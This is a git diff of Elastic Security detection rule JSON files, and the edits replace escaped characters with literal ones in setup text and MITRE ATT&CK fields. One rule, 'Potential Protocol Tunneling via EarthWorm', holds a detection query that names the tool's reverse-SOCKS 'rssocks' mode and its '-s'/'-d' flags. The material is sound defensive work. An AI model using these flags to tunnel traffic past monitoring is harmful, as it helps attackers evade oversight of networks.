+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json
index 01aa15c6848..4031ca6153f 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json
index 1c12dae77a0..4b404637aee 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via EarthWorm", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n", "references": [ "http://rootkiter.com/EarthWorm/", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json index 82837b1fa70..cd0b3fca34d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json index 82ba13a5780..1fd3540c023 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json index 91ac16bf986..762c2be2814 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json 
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json
index 0e7c8c9fe4e..1684034a44d 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json
index 18fb2a42f3b..a63b19c51e9 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json
index b92c8d40eaa..0c913a1c8a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_108.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json
index 5739ce39eb9..78f012f897f 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_109.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```",
